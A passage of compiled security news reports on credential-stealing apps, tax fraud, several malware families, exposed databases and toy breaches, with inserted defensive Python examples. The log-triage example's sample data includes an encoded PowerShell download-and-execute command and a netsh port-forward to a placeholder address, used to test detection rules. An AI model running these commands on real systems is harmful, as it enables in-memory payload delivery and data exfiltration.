the user's login details, send them to a remote server, and show a login error. The error would appear every time the user tried to authenticate, and after a certain number of login attempts the error would change and ask the user to visit the official Instagram site instead and authorize the app from there. When the user visited the Instagram homepage, he would see a notification from Instagram letting him know that someone had accessed his account. From this point on, if victims don't change their passwords, the crook would use the victim's Instagram account to like images or follow other accounts. Stefanko believes these apps power online services that offer Instagram likes and followers for money. Back in January, the researcher discovered a similar app that stole Instagram credentials and targeted Turkish users. That app, as well, was hosted on the official Google Play Store. Other ways in which hackers could use the stolen Instagram credentials are to post image ads on people's profiles and to extort some kind of payment from the owners of accounts with a large follower base. Overall, there have been many cases of apps that stole Instagram credentials in the past few years. In November 2015, Apple removed an app named "Who Viewed Your Profile - InstaAgent" from the App Store because of the same behavior. Six months later, Google faced a similar incident and was forced to remove two apps named "Who Viewed Me on Instagram" and "InstaCare - Who cares with me?", also caught stealing Instagram credentials.
Every year, cybercriminals cash in on tax season by targeting individuals, but this year it's a little different. It's businesses that must be extra careful when filing, because businesses are experiencing a rise in tax-related scams, specifically W-2 fraud. Researchers at IBM X-Force, the tech giant's security research division, discovered more than 1400% growth in general tax-themed spam between December 2016 and March 2017. "On top of all the usual activity -- consumer tax fraud, filing on others' behalf -- we began to see that businesses are being targeted a lot more," says Limor Kessem, executive security advisor for IBM Security. In the past, she says, tax fraud on businesses was the purview of only advanced attackers. This year, they saw a rise in social engineering attacks on smaller organizations like schools, non-profits, and restaurants as fraudsters start to aim for the "low-hanging fruit" of the corporate world. Cybercriminals often collect W-2 data by pretending to be a company exec and emailing HR or payroll for employee information, which is used to file fraudulent returns and collect refunds. In addition, they may also request a wire transfer to a specific bank account. Attackers who are more technically inclined may bypass the fake emails and breach an organization's servers to steal data directly, says Kessem. In addition to using W-2 data for their own scams, fraudsters will sell it on the dark web, the report states. The most valuable bundles of information are called "Fullz" and contain the victim's address, contact info, Social Security and driver's license numbers, plus all W-2 and W-9 information. Each record runs for $40-$50 in Bitcoin on the Dark Web. With all this data for $50 per record, harmful activity doesn't have to stop at tax fraud, Kessem notes.
Cybercriminals can buy and use this data for other scams like identity theft or online loan applications. Tax-related risks increase as the filing deadline approaches. One-third of Americans (54 million people) filed their taxes after April 1 in 2016, giving fraudsters a larger window of opportunity to strike. Tax-related cybercrime won't stop after April 18, 2017. "There are a number of people filing after the deadline," says Kessem, noting the popularity of extensions. "There are millions who will still be interested in tax-themed emails." However, their tax scam strategies will shift after the deadline as cybercriminals move from stealing data to infecting machines with malware. Because victims may expect messages indicating problems with their returns, they are more likely to open potentially malicious attachments, Kessem explains. Researchers believe data sets sold on the Dark Web are a sign that fraudsters are stealing tax info from employer databases -- meaning they get it before the taxpayers.
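The executive-impersonation pattern described above (a mail that claims to come from a company officer and asks HR or payroll for W-2 data) can be screened for at the mail gateway with a few header checks. The following is an added example written for this page, not code from IBM X-Force or the report; the company domain, executive roster and the three sample header sets are constructed, and the Authentication-Results check assumes the gateway records a `dmarc=` verdict in that header.

```python
import re
from email.utils import parseaddr

# Assumed company domain and executive roster (constructed for this example).
COMPANY_DOMAIN = "example-corp.com"
EXECUTIVES = {
    "jane doe": "jane.doe@example-corp.com",
    "raj patel": "raj.patel@example-corp.com",
}


def normalize_name(display_name: str) -> str:
    """'Jane Doe, CEO' -> 'jane doe': drop a title after a comma, lower-case, collapse spaces."""
    base = display_name.split(",")[0]
    return re.sub(r"\s+", " ", base).strip().lower()


def domain_of(address: str) -> str:
    """Domain part of an address, lower-cased; empty string if there is none."""
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def assess_headers(headers: dict) -> list:
    """Return (code, detail) findings for one message's headers; empty list means nothing flagged."""
    findings = []
    name, addr = parseaddr(headers.get("From", ""))
    addr = addr.lower()

    # 1. Display name belongs to an executive, but the address is not that executive's.
    expected = EXECUTIVES.get(normalize_name(name))
    if expected and addr != expected:
        findings.append(("exec-name-mismatch",
                         f"display name '{name}' but sender is {addr} (expected {expected})"))

    # 2. Reply-To points outside the From domain, so replies (and attachments) go elsewhere.
    _, reply_to = parseaddr(headers.get("Reply-To", ""))
    if reply_to and domain_of(reply_to) != domain_of(addr):
        findings.append(("reply-to-mismatch",
                         f"Reply-To {reply_to} differs from From domain {domain_of(addr)}"))

    # 3. Claims our own domain, but the gateway did not record a DMARC pass for it.
    auth = headers.get("Authentication-Results", "").lower()
    if domain_of(addr) == COMPANY_DOMAIN and "dmarc=pass" not in auth:
        findings.append(("dmarc-not-passed",
                         f"From {addr} is internal but Authentication-Results lacks dmarc=pass"))
    return findings


# Constructed sample header sets: one legitimate mail, one look-alike domain, one spoofed sender.
SAMPLE_MESSAGES = {
    "legit": {
        "From": '"Jane Doe" <jane.doe@example-corp.com>',
        "Subject": "Q1 board deck",
        "Authentication-Results": "mx.example-corp.com; spf=pass; dkim=pass; dmarc=pass header.from=example-corp.com",
    },
    "lookalike": {
        "From": '"Jane Doe, CEO" <jane.doe@example-corp-hr.com>',
        "Subject": "Urgent: need all employee W-2s today",
        "Authentication-Results": "mx.example-corp.com; spf=pass; dkim=pass; dmarc=pass header.from=example-corp-hr.com",
    },
    "spoofed": {
        "From": '"Jane Doe" <jane.doe@example-corp.com>',
        "Reply-To": "ceo.jane@webmail.example.net",
        "Subject": "W-2 summary for all staff",
        "Authentication-Results": "mx.example-corp.com; spf=fail; dkim=none; dmarc=fail header.from=example-corp.com",
    },
}

if __name__ == "__main__":
    for label, hdrs in SAMPLE_MESSAGES.items():
        print(label, assess_headers(hdrs) or "no findings")
```

The look-alike case is caught purely by the roster comparison, which is why the roster must be kept current; the spoofed case passes that comparison and is caught only by the Reply-To and DMARC checks, so all three are needed together.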
The two hired the services of a local programmer to develop their own brand of malware, a backdoor trojan, which authorities have named EyePyramid. The men used simple spear-phishing emails sent to the high-ranking officials they wanted to infect. The emails came with a file attachment, which when opened would covertly install their malware. EyePyramid would collect information from the target's system, such as passwords, sensitive documents, and more. The malware would upload this data to various online servers or send it to an email address (via SMTP). Italian officials said the two suspects, Giulio Occhionero (age 45) and Francesca Maria Occhionero (age 49), had most likely used this information for financial profit. It is unclear if this means stock market transactions or blackmail attempts. The two were discovered when one of their emails reached a security researcher, who discovered the payload and notified local police. An investigation followed, and Italian police, together with the FBI, arrested the two and seized servers used to spread the malware and store the stolen data. The two deployed their malware in separate campaigns that took place in 2008, 2010, 2011, 2012, and 2014. Court documents reveal the men used the malware to collect around 87GB of data, consisting of keystroke information, 18,327 usernames, and 1,793 passwords. Username and password information was arranged in 122 categories, based on the target's affiliation, such as business, politics, and more. The EyePyramid malware targeted the following file types for exfiltration: A full list of IOCs has been compiled by Trend Micro security researcher Federico Maggi and is available on GitHub. The researcher has also published an analysis of the malware's inner workings, not available in court documents, on the Trend Micro blog.
The list of victims includes names such as former prime minister Matteo Renzi, former prime minister Mario Monti, cardinal Gianfranco Ravasi, head of the European Central Bank Mario Draghi, Vatican officials, members of Italy's tax police, Bank of Italy officials, representatives of the Italian Senate, and members of several Italian ministries (Finance, Economy, Internal Affairs, Foreign Affairs, and others). In a TV interview, Italian investigators said Giulio Occhionero was a high-ranking member of a Masonic lodge. The words "eye" and "pyramid," used regularly in the malware's source code, are some of the best-known symbols of Freemasonry.
Named GhostAdmin, this threat is part of the "botnet malware" category. According to current information, the malware is already distributed and deployed in live attacks, being used to possibly target at least two companies and steal hundreds of GBs of information. According to MalwareHunterTeam and other researchers who have looked at the malware's source code, GhostAdmin seems to be a reworked version of CrimeScene, another botnet malware family that was active around 3-4 years ago. Under the hood, GhostAdmin is written in C# and is already at version 2.0. The malware works by infecting computers, gaining boot persistence, and establishing a communications channel with its command and control (C&C) server, which is an IRC channel. GhostAdmin's authors access this IRC channel and issue commands that will be picked up by all connected bots (infected computers). The malware can interact with the victim's filesystem, browse to specific URLs, download and execute new files, take screenshots, record audio, enable remote desktop connections, exfiltrate data, delete log files, interact with local databases, wipe browsing history and more. A full list of available commands is available via the image below: The malware's features revolve around the ability to collect data from infected computers and silently send it to a remote server. GhostAdmin operates based on a configuration file. Among the settings stored in this file, there are FTP and email credentials. The FTP credentials are for the server where all the stolen information is uploaded, such as screenshots, audio recordings, keystrokes and more. On the other hand, the email credentials are used to send an email to the GhostAdmin author every time a victim executes his malware, and also to send error reports.
MalwareHunterTeam says that the GhostAdmin version he analyzed was compiled by a user who used the nickname "Jarad." Like almost all malware authors before him, Jarad managed to infect his own computer. Using the FTP credentials found in the malware's configuration file, MalwareHunterTeam found screenshots of the GhostAdmin creator's desktop on the FTP server. Furthermore, the researcher also found on the same server files that appeared to be stolen from GhostAdmin victims. The possible victims include a lottery company and an Internet cafe. From the Internet cafe alone, the crook has apparently collected 368GB of data. From the lottery company, the GhostAdmin botmaster appears to have stolen a database holding information such as names, dates of birth, phone numbers, emails, addresses, employer information, and more. At the time of writing, according to MalwareHunterTeam, the botnet's IRC channel includes only around ten bots, an approximate victims headcount. Compared to other botnet malware families such as Necurs or Andromeda, which have millions of bots, GhostAdmin is just making its first victims. In its current form, GhostAdmin and its botmaster seem to be focused on data theft and exfiltration. At the time of writing, GhostAdmin's detection rate on VirusTotal was only 6 out of 55 (sample here).
Insecure backend databases and mobile apps are making for a dangerous combination, exposing an estimated 280 million records that include a treasure trove of private user data. According to a report by Appthority, more than 1,000 apps it looked at on mobile devices leaked personally identifiable information that included passwords, location, VPN PINs, emails and phone numbers. Appthority's Mobile Threat Team called the vulnerability HospitalGown and said the culprits behind the threat are misconfigured backend storage platforms including Elasticsearch, Redis, MongoDB and MySQL. "HospitalGown is a vulnerability to data exposure caused, not by any code in the app, but by the app developers' failure to properly secure the backend servers with which the app communicates," wrote the authors of the report released Wednesday. According to Seth Hardy, director of security research, the problem is a byproduct of the insecure database installations that made headlines in February. That's when misconfigured and insecure MongoDB, Hadoop and CouchDB installations became popular extortion targets for hackers who were scanning for vulnerable servers to attack. The weak link in the chain when it comes to HospitalGown is the insecure servers that apps connect to, Hardy said. During the course of Appthority's investigation, it found 21,000 open Elasticsearch servers, revealing more than 43 terabytes of exposed data. In one scenario, the attacker looks for vulnerabilities in the space between the vendor's mobile application and the app's server-side components, according to researchers.
"The servers for most mobile applications are cloud based and accessible via the Internet; this allows a bad actor to skip the long and potentially many-layered 'compromise' stage of an attack, accessing company data directly from a database that is impossible for the enterprise to see or secure," they wrote. Researchers said the vulnerable mobile apps they found ran the gamut, from office productivity, enterprise access management, games and dating to travel, flight and hotel applications. Any personally identifiable data a user shared with the app was vulnerable to possible exfiltration by a hacker. "These servers were accessible from the Internet, lacked any means of authentication to prevent unwanted access to the data they contained, and failed to secure transport of data, including PII, using HTTPS: conventions," according to the report. While this is strictly a data security issue, Appthority said, attacks can quickly escalate and personal information could easily be leveraged in a spear phishing attack or brute force attack. In its report, Appthority showed how a mobile VPN app called Pulse Workspace, used by enterprises, government agencies and service providers, leaked data. While Pulse Workspace created an API to secure front-end Elasticsearch access, the backend, and all of the app's data records, were exposed and leaked Pulse customer data. Appthority notified Pulse Workspace and its customers of the vulnerability, which has since been fixed.
Appthority is careful to point out that each of the platforms it examined (Elasticsearch, Redis, MongoDB, and MySQL) had plugins to allow for proper public exposure on the internet. "Best practices on secure data stores are just not being adopted in too many cases," Hardy said. Elasticsearch, for example, has a bevy of security and data protection capabilities, such as being able to encrypt all the data that's on the platform. Increasing the risk of HospitalGown-type attacks is the fact that many apps Appthority looked at seemed benign in terms of shared user data. But, increasingly, apps have advertising components that collect personally identifiable data that can be mined by hackers for phishing or ransomware attacks. App developers and system administrators need to know where their data is stored and make sure it is secured, Hardy told Threatpost.
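The three HospitalGown conditions quoted from the report (reachable from the Internet, no authentication, no TLS on the transport) map directly onto a handful of settings in the backend's own configuration file, which is the place to catch them before deployment. The following is an added example for this page, not code from Appthority or from Elasticsearch: a small checker that reads the flat `key: value` lines of an `elasticsearch.yml` and reports each of the three conditions. It assumes the `network.host`, `xpack.security.enabled` and `xpack.security.http.ssl.enabled` settings of Elasticsearch 6.x/7.x, treats an absent `xpack.security.enabled` as off (the default in those versions), and uses two constructed configuration fragments as input.

```python
# Bind values that put the HTTP API on every interface of the host.
EXPOSED_BIND_VALUES = {"0.0.0.0", "::", "_global_"}


def parse_flat_yaml(text: str) -> dict:
    """Minimal parser for the flat 'dotted.key: value' lines elasticsearch.yml uses.
    Comments, blank lines and surrounding quotes are stripped; nested and list syntax is not handled."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        settings[key.strip()] = value.strip().strip("'\"")
    return settings


def audit_elasticsearch_config(yaml_text: str) -> list:
    """Return (setting, explanation) findings; an empty list means none of the three conditions holds."""
    cfg = parse_flat_yaml(yaml_text)
    findings = []
    host = cfg.get("network.host", "")
    if host in EXPOSED_BIND_VALUES:
        findings.append(("network.host",
                         f"binds every interface ({host}); the API is reachable from wherever the host is routable"))
    # Absent setting is treated as 'false', matching the 6.x/7.x default (assumption).
    if cfg.get("xpack.security.enabled", "false").lower() != "true":
        findings.append(("xpack.security.enabled",
                         "authentication is off: any client that reaches port 9200 can read and write every index"))
    if cfg.get("xpack.security.http.ssl.enabled", "false").lower() != "true":
        findings.append(("xpack.security.http.ssl.enabled",
                         "HTTP API is served in cleartext, so credentials and PII cross the network unencrypted"))
    return findings


# Constructed fragment showing the weak settings the report describes.
WEAK_CONFIG = """
cluster.name: app-backend
network.host: 0.0.0.0          # listens on all interfaces
http.port: 9200
xpack.security.enabled: false  # no authentication at all
"""

# Constructed fragment with the corrected settings (certificate paths are placeholders).
HARDENED_CONFIG = """
cluster.name: app-backend
network.host: 10.0.1.12        # private address; reach it only through the app's API tier
http.port: 9200
xpack.security.enabled: true
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.keystore.path: certs/http.p12
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_elasticsearch_config(text) or "no findings")
```

Binding to a private address only moves the problem if a security group or load balancer forwards port 9200 anyway, so the `network.host` finding should be read together with the network-level exposure rather than instead of it; the authentication and TLS findings hold regardless of where the host sits.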
Experts have cast doubt on a recent report claiming that hackers linked to a Russian military intelligence agency used a piece of Android malware to track Ukrainian artillery units. A report published by threat intelligence firm CrowdStrike before Christmas revealed that the Russia-linked cyberespionage group known as Fancy Bear (aka APT28, Pawn Storm, Sofacy, Tsar Team, Strontium and Sednit) modified a legitimate Android app used by the Ukrainian military. Specifically, researchers found an Android version of X-Agent, a piece of malware known to be used by Fancy Bear, embedded in an app developed by artillery officer Yaroslav Sherstuk to help military personnel reduce the time to fire D-30 howitzers. According to CrowdStrike, the malicious app, which had been distributed on Ukrainian military forums from late 2014 through 2016, was capable of accessing contact information, SMS messages, call logs and Internet data. The security firm believes these capabilities could have allowed Russia to track Ukrainian troops via the app. CrowdStrike also pointed to a report claiming that Ukraine had lost many D-30 guns in the past years, and speculated that this cyber operation may have contributed to those losses. Based on its investigation, the company is confident that Fancy Bear is connected to the Russian military, particularly the GRU foreign military intelligence agency. Sherstuk has called CrowdStrike's report "delusional" and pointed out that the app is not open source. He says the application has been under his control and he personally oversees the activation of each installation. Jeffrey Carr, CEO of Taia Global and founder of the Suits and Spooks conference, has analyzed CrowdStrike's report and, after contacting several other experts, he determined that the security firm's arguments are flawed.
According to Carr, while X-Agent may be used by Fancy Bear, the malware is not exclusive to the group. The X-Agent source code appears to have been obtained by several entities, including Ukrainian hacktivist Sean Townsend and the security firm ESET. The X-Agent variant found in the Ukrainian military app has also been analyzed by CrySyS, the Hungary-based security firm that has investigated several sophisticated pieces of malware, including Duqu. Researchers have found similarities between X-Agent implants described in previous Fancy Bear reports and the version found in the Ukrainian military app, but they pointed out that such similarities can be faked by threat actors. Another interesting discovery is that the rogue app does not use GPS to obtain the infected device's exact location, which Carr calls "a surprising design flaw for custom-made malware whose alleged objective was to collect and transmit location data on Ukrainian artillery to the GRU". While the malware can collect some location data via the base stations used by the infected Android device, Carr believes it's not enough to track someone, especially given Ukraine's poor cellular service. Pavlo Narozhnyy, a technical adviser to Ukraine's military, told VOA that he doubts the D-30 app can be hacked, and he claimed that none of the app's users reported any D-30 howitzer losses. Carr also highlighted that the malware-infected app may not actually have made it onto a single Ukrainian soldier's Android device, considering that each user needed to contact Sherstuk personally to obtain an activation code.
Google Play, the official market for Android apps, was caught hosting a ransomware app that infected at least one real-world handset, security researchers said Tuesday. The ransomware was dubbed Charger and was hidden inside an app called EnergyRescue, according to a blog post published by security firm Check Point Software. Once installed, Charger stole SMS contacts and prompted unsuspecting users to grant it all-powerful administrator rights. If users clicked OK, the malicious app locked the device and displayed the following message:

"You need to pay for us, otherwise we will sell portion of your personal information on black market every 30 minutes. WE GIVE 100% GUARANTEE THAT ALL FILES WILL RESTORE AFTER WE RECEIVE PAYMENT. WE WILL UNLOCK THE MOBILE DEVICE AND DELETE ALL YOUR DATA FROM OUR SERVER! TURNING OFF YOUR PHONE IS MEANINGLESS, ALL YOUR DATA IS ALREADY STORED ON OUR SERVERS! WE STILL CAN SELLING IT FOR SPAM, FAKE, BANK CRIME etc… We collect and download all of your personal data. All information about your social networks, Bank accounts, Credit Cards. We collect all data about your friends and family."

The app sought 0.2 Bitcoin, currently worth about $180. In an e-mail, Check Point researchers said the app was available in Google Play for four days and had only a "handful" of downloads. "We believe the attackers only wanted to test the waters and not spread it yet," the researchers told Ars. The infection was detected by Check Point's mobile malware software, which the company sells to businesses. Google officials have since removed the app and have thanked Check Point for raising awareness of the issue.
Imagine turning on your smartphone to send a text and finding this threatening notice instead: "You need to pay for us, otherwise we will sell portion of your personal information on black market every 30 minutes. WE GIVE 100% GUARANTEE THAT ALL FILES WILL RESTORE AFTER WE RECEIVE PAYMENT. WE WILL UNLOCK THE MOBILE DEVICE AND DELETE ALL YOUR DATA FROM OUR SERVER! TURNING OFF YOUR PHONE IS MEANINGLESS, ALL YOUR DATA IS ALREADY STORED ON OUR SERVERS! WE STILL CAN SELLING IT FOR SPAM, FAKE, BANK CRIME etc. We collect and download all of your personal data. All information about your social networks, Bank accounts, Credit Cards. We collect all data about your friends and family." This is the message, word for word, found recently by Oren Koriat and Andrey Polkovnichenko, a pair of mobile cybersecurity analysts at Check Point, a security firm in California. The smartphone on which it appeared was an Android model that had been compromised by smartphone ransomware. Ransomware has become a ubiquitous threat to personal-computer users. Criminals remotely access a victim's computer and lock all the files using encryption software, offering to unlock the data in exchange for a payment. The first ransomware attack on a phone occurred in 2013, according to the Check Point researchers, but until now it has been confined to small numbers of victims, primarily in Eastern Europe. Now, the company says, the threat has gained a toehold in the United States. Koriat and Polkovnichenko found the software, which they dubbed Charger, embedded in an app called Energy Rescue, which purports to make a phone battery last longer. "The infected app steals contacts and SMS messages from the user's device and asks for admin permissions," the company said in a statement.
"If granted, the ransomware locks the device and displays a message demanding payment." The payment demanded was 0.2 bitcoin, or about $180 at the current exchange rate. (The phone was being used for business and didn't contain much personal data; the owner chose to replace the phone rather than pay.) The most disturbing part of the attack might be that the app was downloaded from the Google Play store. Android phones can use apps from other sources, but security experts usually recommend that users stick to the Play store to take advantage of the processes Google uses to check the software for safety. "The main issue here is the fact that such a severe threat managed to penetrate Google's security and enter Google Play, Google's official app store," says Daniel Padon, another member of Check Point's research team. "Most malware that manages to enter Google Play has only slim malicious traits, while Charger is about as malicious as can be. As mobile ransomware tries to keep pace with its cousins in the PC world, we are likely to see more efforts of this sort, endangering users around the world." Padon added that this malware was particularly sophisticated, using a number of innovative tactics to evade detection by Google. Google commended the security firm for catching the Charger threat so early. "We appreciate Check Point's efforts to raise awareness about this issue," a Google spokesperson says. "We've taken the appropriate actions in Play and will continue to work closely with the research community to help keep Android users safe." Ransomware attacks on mobile phones are still relatively rare. One well-known case involved users of pornography apps in Eastern Europe who were targeted by ransomware called DataLust, Check Point says. In those cases, the ransom was set at 1,000 rubles, or about $15.
There's evidence that Charger, too, comes from Eastern Europe, beyond the clichéd bad grammar of the ransom note. "This is likely done to keep the developers from being prosecuted in their own countries or being extradited between countries." Ransomware attacks are joining a growing list of threats to mobile phone security.
"It's pretty high confidence that Fancy Bear had to be in touch with the Russian military," Dmitri Alperovitch told Forbes. Crowdstrike's core argument has three premises: If all of these premises were true, then Crowdstrike's prior claim that Fancy Bear must be affiliated with the GRU [4] would be substantially supported by this new finding. Dmitri referred to it in the PBS interview as "DNA evidence". In fact, none of those premises are supported by the facts. This article is a summary of the evidence that I've gathered during hours of interviews and background research with Ukrainian hackers, soldiers, and an independent analysis of the malware by CrySyS Lab. My complete findings will be presented in Washington D.C. next week on January 12th at Suits and Spooks. Crowdstrike, along with FireEye and other cybersecurity companies, has long propagated the claim that Fancy Bear and all of its affiliated monikers (APT28, Sednit, Sofacy, Strontium, Tsar Team, Pawn Storm, etc.) were the exclusive developers and users of X-Agent. If both a security company and a hacker collective have the X-Agent source code, then so do others, and attribution to APT28/Fancy Bear/GRU based solely upon the presumption of "exclusive use" must be thrown out. This doesn't mean that the Russian government may not choose to use it. In fact, Sean Townsend believes that the Russian security services DO use it, but he also knows that they aren't the only ones. The first iteration of the POPR-D30 Android app designed by Ukrainian military officer Jaroslav Sherstuk (and the only iteration allegedly impacted by this malware) was a simple ballistics program that calculated corrections for humidity, atmospheric pressure, and other environmental factors that determine the accuracy of the D-30 Howitzer. The Android APK malware doesn't use GPS, nor does it ask for GPS location information from the infected phone or tablet.
That's a surprising design flaw for custom-made malware whose alleged objective was to collect and transmit location data on Ukrainian artillery to the GRU. It does collect base station information, but that isn't nearly sufficient for targeting purposes. In rural areas, one base station could have a range of up to 30 kilometers (18.6 miles). Crowdstrike's estimate of 80% losses of the D-30 Howitzers came from one source: an article written by pro-Russian blogger Boris Rozhin, a resident of Crimea who writes for a blog called The Saker, which he calls "the voice of totalitarian propaganda". Bloomberg journalist Leonid Bershidsky pointed out that the estimates "appear to be based on an assumption that changes in military balance reports, themselves far from perfect, can be interpreted as losses. Ukraine, a nation at war, doesn't broadcast information about its specific capabilities". Pavlo Narozhnyy, a Ukraine military advisor, told VOA that "I personally know hundreds of gunmen in the war zone. None of them told me of D-30 losses caused by hacking or any other reason". Even Rozhin acknowledged that his interpretation of the International Institute of Strategic Studies (IISS) data needs work: "Generally speaking, both methods have their advantages and disadvantages, as it is obvious that lost armour did not count everything destroyed, as well as that the loss of hardware (counted based on staffing standards) in some cases did not mean that it was destroyed. For example, some hardware lost after 2013 was left in Crimea and returned to Ukraine only partially. Some hardware could have existed only on paper and even before the war could have been non-repairable. This suggests that the real losses of the UA still need to be further researched to make the conclusions more precise".
While the original POPR-D30 app was available for download online, users had to contact Sherstuk personally and provide their military credentials in order to receive an activation code. There is no evidence that any of those users had their apps compromised by malware. In fact, Crowdstrike hasn’t provided any evidence that the malware-infected Android app was used by even a single Ukrainian soldier. Sherstuk himself stopped supporting the first version in 2015 [10], so how could Crowdstrike even begin to justify its claims as to the malware’s effectiveness? Part of the evidence supporting Russian government involvement in the DNC and related hacks (including the German Bundestag and France’s TV5 Monde) stemmed from the assumption that X-Agent malware was exclusively developed and used by Fancy Bear. We now know that’s false, and that the source code has been obtained by others outside of Russia. The GRU, according to Crowdstrike, developed a variant of X-Agent to infect an Android mobile app in order to geolocate and destroy Ukraine’s D-30 howitzers. To do this, they chose an artillery app which had no way to send or receive data, and wrote malware for it that didn’t ask for GPS position information? Crowdstrike never contacted the app’s developer to inform him about their findings. Had they performed that simple courtesy, they might have learned from Jaroslav Sherstuk how improbable, if not impossible, their theory was. Instead, they worked inside their own research bubble, performed no verification of infected applications or tablets used by Ukraine’s artillery corps, and extrapolated an effect of 80% losses based upon a self-proclaimed, pro-Russian propagandist and an imaginary number of infected applications.
Two years ago, researchers at Moscow-based Kaspersky Lab discovered their corporate network was infected with malware that was unlike anything they had ever seen. Virtually all of the malware resided solely in the memory of the compromised computers, a feat that had allowed the infection to remain undetected for six months or more. Kaspersky eventually unearthed evidence that Duqu 2.0, as the never-before-seen malware was dubbed, was derived from Stuxnet, the highly sophisticated computer worm reportedly created by the US and Israel to sabotage Iran's nuclear program. The Kaspersky Lab researchers still don't know if a single group of individuals is behind the attacks, or if they're being carried out by competing hacker gangs. The use of fileless malware and of command-server domains that aren't associated with any whois data makes the already difficult task of attribution almost impossible. The researchers first discovered the malware late last year, when a bank's security team found a copy of Meterpreter, an in-memory component of Metasploit, residing inside the physical memory of a Microsoft domain controller. After conducting a forensic analysis, the researchers found that the Meterpreter code was downloaded and injected into memory using PowerShell commands. The infected machine also used Microsoft's NETSH networking tool to transport data to attacker-controlled servers. To obtain the administrative privileges necessary to do these things, the attackers also relied on Mimikatz. To reduce the evidence left in logs or on hard drives, the attackers stashed the PowerShell commands in the Windows registry. Fortunately, the evidence on the domain controller was intact, presumably because it hadn't been restarted before Kaspersky Lab researchers began their investigation.
An analysis of the dumped memory contents and the Windows registries allowed the researchers to restore the Meterpreter and Mimikatz code. The attackers, the researchers later determined, had used the tools to collect passwords of system administrators and for the remote administration of infected host machines.
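As an added illustration (not code from Kaspersky Lab or from the article), here is a Python triage pass over constructed process-creation records that flags the behaviours described above: encoded PowerShell that decodes to a download cradle executed in memory, a command that pulls a script back out of the registry, and netsh spawned by PowerShell (assumed here to be its port-forwarding feature). The log format, rule names, hostnames, registry path and addresses are all this example's own assumptions.

```python
"""Triage of constructed process-creation events for the fileless chain described above:
PowerShell pulling a payload into memory, a script stashed in the registry, netsh moving
data out. The log format and rule names are this example's own assumptions."""
import base64
import re

# PowerShell's -EncodedCommand flag (and the prefixes it accepts), then the base64 blob.
ENC_FLAG = re.compile(r"\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
RULES = {  # heuristic rules, run over the raw command line *and* any decoded payload
    "download_cradle": re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load", re.I),
    "registry_stored_script": re.compile(r"(?:Get-ItemProperty|\bgp\b)\s+['\"]?HK(?:LM|CU)\b", re.I),
    "netsh_portproxy": re.compile(r"\bnetsh(?:\.exe)?\b.*\bportproxy\b", re.I),
}

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE text), or ''."""
    if not (m := ENC_FLAG.search(cmdline)):
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""  # not a valid blob: treat as plain text rather than crash the sweep

def triage(log_lines):
    """Lines are timestamp|host|parent image|image|command line (constructed format);
    returns (host, image, [rule names]) for each event that trips at least one rule."""
    findings = []
    for line in log_lines:
        parts = line.rstrip("\n").split("|", 4)
        if len(parts) != 5:
            continue  # malformed record: skip it rather than abort the sweep
        _, host, parent, image, cmdline = parts
        decoded = decode_encoded_command(cmdline)
        hits = ["encoded_powershell"] if decoded else []
        hits += [name for name, rx in RULES.items() if rx.search(cmdline + "\n" + decoded)]
        if image.lower().startswith("netsh") and parent.lower().startswith("powershell"):
            hits.append("netsh_spawned_by_powershell")  # unusual parent/child pairing
        if hits:
            findings.append((host, image, hits))
    return findings

# Constructed sample events (not real telemetry); the encoded payload is built here.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x')".encode("utf-16-le")).decode()
SAMPLE_LOG = [
    "2017-02-08T03:14:07Z|DC01|services.exe|powershell.exe|powershell.exe -nop -w hidden -enc " + _ENC,
    "2017-02-08T03:14:09Z|DC01|powershell.exe|powershell.exe|powershell.exe -c \"IEX (Get-ItemProperty HKLM:\\SOFTWARE\\Example).Payload\"",
    "2017-02-08T03:15:30Z|DC01|powershell.exe|netsh.exe|netsh interface portproxy add v4tov4 listenport=4444 connectaddress=203.0.113.5 connectport=443",
    "2017-02-08T03:20:00Z|WS07|explorer.exe|powershell.exe|powershell.exe -File C:\\Scripts\\inventory.ps1",
]
```

Running `triage(SAMPLE_LOG)` flags the three DC01 events and leaves the plain script run on WS07 alone; in practice the same rules would be fed from Sysmon or Security 4688 events with command-line auditing enabled.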
The most recent incident involves smart teddy bears -- which can receive and send voice messages between children and parents -- that were caught up in a data breach affecting more than 800,000 user accounts. The company behind the products, Spiral Toys, is denying that any customers were hacked. Zach Lanier, director of research at Cylance, went through the more famous incidents involving toys and breaches and offers a tip with each case. Spiral Toys allegedly made the mistake of storing customer information in a publicly exposed online MongoDB database that required no authentication, which may have given attackers access to voice recordings from the toy's customers. Thus anyone, including the attackers, was able to view and steal the data. CloudPets placed no requirement on password strength, making it much easier to guess passwords. Tip: Always create a secure password, no matter the strength requirement. Include lowercase and uppercase letters, symbols and numbers. Use a password manager to help create and store unique passwords for sites and services. A line of stuffed animals, these connected toys pair with a mobile application that was vulnerable due to a number of weak APIs, which didn't verify who sent messages. This meant that an attacker could guess usernames or email addresses and ask the Fisher-Price server to return details about associated accounts and children's profiles, which include their name, birthdate, gender, language and the toys they have played with. Tip: If the IoT device connects to a mobile app or desktop computer, it is important to examine how it connects. If the URL begins with http rather than https (the secure version of HTTP), then your device is making a less secure connection.
